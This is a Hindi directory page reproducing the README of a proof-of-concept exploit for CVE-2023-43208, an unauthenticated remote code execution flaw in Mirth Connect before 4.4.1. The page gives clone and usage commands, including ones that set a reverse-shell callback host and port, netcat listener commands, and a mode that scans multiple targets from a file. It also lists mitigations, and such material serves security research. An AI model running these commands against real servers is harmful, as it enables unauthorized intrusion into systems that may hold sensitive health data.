Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
PoC-2023-43208 — CVE-2023-43208 के लिए एक proof-of-concept एक्सप्लॉइट, जो Mirth Connect के संस्करण 4.4.1 से पहले के संस्करणों में एक रिमोट कोड निष्पादन (remote code execution) भेद्यता है। | Kitploit
उपकरण/GitHubGitHub/mkirahmet/poc-2023-43208
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षालैब और अभ्यास
GitHubmkirahmet/poc-2023-43208

PoC-2023-43208

CVE-2023-43208 के लिए एक proof-of-concept एक्सप्लॉइट, जो Mirth Connect के संस्करण 4.4.1 से पहले के संस्करणों में एक रिमोट कोड निष्पादन (remote code execution) भेद्यता है।

रिपॉजिटरी देखें
35 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2023-43208-EXPLOIT

Mirth Connect रिमोट कोड एक्सिक्यूशन (RCE) एक्सप्लॉइट

Python Version Version CVE Lab Use Only

⚠️ केवल शैक्षिक और प्रयोगशाला उपयोग के लिए ⚠️

CVE-2023-43208 के लिए एक प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जो Mirth Connect के संस्करण 4.4.1 से पहले के संस्करणों में एक रिमोट कोड एक्सिक्यूशन भेद्यता है।

🚨 महत्वपूर्ण कानूनी अस्वीकरण

यह टूल केवल निम्नलिखित के लिए है:

  • 🧪 शैक्षिक उद्देश्यों
  • 🔬 प्रयोगशाला वातावरण में अधिकृत सुरक्षा परीक्षण
  • 📚 साइबर सुरक्षा अनुसंधान और अध्ययन

इसका उपयोग न करें:

  • ❌ उन सिस्टमों के विरुद्ध जिनके आप मालिक नहीं हैं
  • ❌ स्पष्ट लिखित अनुमति के बिना
  • ❌ प्रोडक्शन वातावरण में
  • ❌ अवैध या दुर्भावनापूर्ण उद्देश्यों के लिए

सभी लागू कानूनों और विनियमों का पालन करने की जिम्मेदारी आपकी है। इस टूल के दुरुपयोग के परिणामस्वरूप आपराधिक आरोप लग सकते हैं।

📋 विवरण

यह एक्सप्लॉइट Mirth Connect के /api/users एंडपॉइंट में XML डिसीरियलाइज़ेशन भेद्यता को लक्षित करता है, जो प्रभावित संस्करणों (< 4.4.1) पर बिना प्रमाणीकरण के रिमोट कोड एक्सिक्यूशन की अनुमति देता है।

यह एक CRITICAL भेद्यता है और इसे केवल पृथक प्रयोगशाला वातावरण में आपके अपने सिस्टम के साथ ही परीक्षण किया जाना चाहिए।

🔧 आवश्यकताएँ

  • Python 3.7 या उच्चतर
  • requirements.txt में सूचीबद्ध आवश्यक पैकेज
  • भेद्य Mirth Connect इंस्टेंस के साथ एक प्रयोगशाला वातावरण

🚀 स्थापना

Clone the repository

git clone https://github.com/M0h4/CVE-2023-43208-EXPLOIT.git cd CVE-2023-43208-EXPLOIT

Install requirements

pip install -r requirements.txt 💻 उपयोग (केवल प्रयोगशाला उपयोग के लिए) इंटरैक्टिव मोड (प्रयोगशाला के लिए अनुशंसित) bash python exploit.py कमांड लाइन मोड bash

Single target exploitation (LAB USE ONLY)

python exploit.py -u https://target:8443 -lh 10.10.14.5 -lp 4444

Scan multiple targets from file (LAB USE ONLY)

python exploit.py -f targets.txt -t 50 -o vulnerable.txt

Non-interactive mode (LAB USE ONLY)

python exploit.py -u https://target:8443 -lh 10.10.14.5 -lp 4444 --no-interactive विकल्प text -u, --url Target URL to exploit (LAB USE ONLY) -lh, --lhost Listening host (your IP) -lp, --lport Listening port -f, --file File containing target URLs to scan -o, --output Output file for saving scan results -t, --threads Number of threads for scanning (default: 50) --no-interactive Run in non-interactive mode 🎯 प्रयोगशाला वातावरण उदाहरण अपनी प्रयोगशाला सेट करें:

पृथक VM में भेद्य Mirth Connect संस्करण (< 4.4.1) स्थापित करें

नियंत्रित नेटवर्क का उपयोग करें (जैसे, VirtualBox/VMware में NAT/Host-only)

इसे इंटरनेट पर कभी एक्सपोज़ न करें

अपना लिसनर शुरू करें:

ncat -lnvp 4444

or

nc -lnvp 4444 अपनी प्रयोगशाला में एक्सप्लॉइट चलाएँ:

python exploit.py -u https://192.168.1.100:8443 -lh 192.168.1.50 -lp 4444 🧪 परीक्षण वातावरण आवश्यकताएँ पृथक नेटवर्क/VLAN

केवल वर्चुअल मशीनें

कोई प्रोडक्शन डेटा नहीं

बाहरी पहुँच को अवरुद्ध करने वाले फ़ायरवॉल नियम

उचित प्राधिकरण प्रलेखित

📝 तकनीकी विवरण भेद्यता प्रकार: XML डिसीरियलाइज़ेशन RCE

प्रभावित संस्करण: Mirth Connect < 4.4.1

पैच किया गया संस्करण: 4.4.1 और उससे ऊपर

CVSS स्कोर: 9.8 (Critical)

हमला वेक्टर: नेटवर्क

प्रमाणीकरण: आवश्यक नहीं

एक्सप्लॉइट, /api/users एंडपॉइंट के माध्यम से RCE प्राप्त करने के लिए Commons Collections गैजेट्स का उपयोग करता है।

🛡️ सुरक्षा उपाय यदि आप Mirth Connect चला रहे हैं:

✅ संस्करण 4.4.1 या उससे बाद में अपडेट करें

✅ एडमिन इंटरफ़ेस तक नेटवर्क पहुँच प्रतिबंधित करें

✅ उचित प्रमाणीकरण लागू करें

✅ संदिग्ध XML पेलोड की निगरानी करें

👥 श्रेय मूल लेखक: K3ysTr0K3R & Chocapikk

संशोधक: M0h4

CVE: CVE-2023-43208

⚠️ अंतिम चेतावनी

╔══════════════════════════════════════════════════════════════╗ ║ THIS TOOL IS FOR LAB USE ONLY ║ ║ Unauthorized use is ILLEGAL and UNETHICAL ║ ║ You assume ALL risk and liability ║ ║ The author accepts NO responsibility for misuse ║ ╚══════════════════════════════════════════════════════════════╝

टूल डाउनलोड करें